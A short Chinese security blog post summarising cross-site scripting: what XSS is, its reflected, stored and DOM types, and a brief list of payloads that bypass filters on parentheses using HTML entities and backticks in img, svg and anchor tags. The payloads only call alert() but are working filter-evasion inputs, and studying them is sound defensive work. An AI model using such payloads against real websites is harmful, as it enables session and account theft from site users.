花名/ID: 天析

邮箱: 2200475850@qq.com

主攻方向: 物联网安全、WEB安全

兴趣爱好: 乒乓球、羽毛球、排球、业余无线电···

备案信息:蜀ICP备19023334号

XSS漏洞绕过总结

什么是XSS漏洞?


漏洞名称 XSS跨站漏洞
漏洞等级 高危
漏洞危害 XSS攻击对WEB服务器虽无直接危害,但是它借助网站进行传播,使网站的用户受到攻击,导致网站用户帐号被窃取,从而对网站也产生了较严重的危害。
解决方案 把一些预定义的字符转换为 HTML 实体,如:&(和号) 成为&," (双引号) 成为 "

XSS漏洞的类型

反射型
假设有这么一段PHP代码:

20200402175600.png
20200402175600.png

存储型

DOM型

1.反射型:
一般来说这种类型的XSS,需要攻击者提前构造一个恶意链接,来诱使客户点击,比如这样的一段链接:www.abc.com/?params=
2.存储型:
这种类型的XSS,危害比前一种大得多。比如一个攻击者在论坛的楼层中包含了一段JavaScript代码,并且服务器没有正确进行过滤输出,那就会造成浏览这个页面的用户执行这段JavaScript代码。
3.DOMXSS:
这种类型则是利用非法输入来闭合对应的html标签。
比如,有这样的一个a标签:
乍看问题不大,可是当$var的内容变为 ’ οnclick=’alert(/xss/) //,这段代码就会被执行。

payload

  • 针对过滤圆括号
<img src=1111111 onerror=alert&lpar;1&rpar;>   
<img src=1111111 onerror=javascript:alert&#x28;1&#x29>
<a href="javascript:alert&#40/1/&#41">axxx</a>
<svg><script>alert &#40 1 &#41 </script></svg>
<img src=1 onerror=alert&#40;1&#41;>
<img src=x onerror=alert`1`>

遇到某些不可抗力,后面在继续更新!

文章所属分类:  Web安全 

« 三级信息安全笔记(一) 短距离无线通信技术(学习笔记) »